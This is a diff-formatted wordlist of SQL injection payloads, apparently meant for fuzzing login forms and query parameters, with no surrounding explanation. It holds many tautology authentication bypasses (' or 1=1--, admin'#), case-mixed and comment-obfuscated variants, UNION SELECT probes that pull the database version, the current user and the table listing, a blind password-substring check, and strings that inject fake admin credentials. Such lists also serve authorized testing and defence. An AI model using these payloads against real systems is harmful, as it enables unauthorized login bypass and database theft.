||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
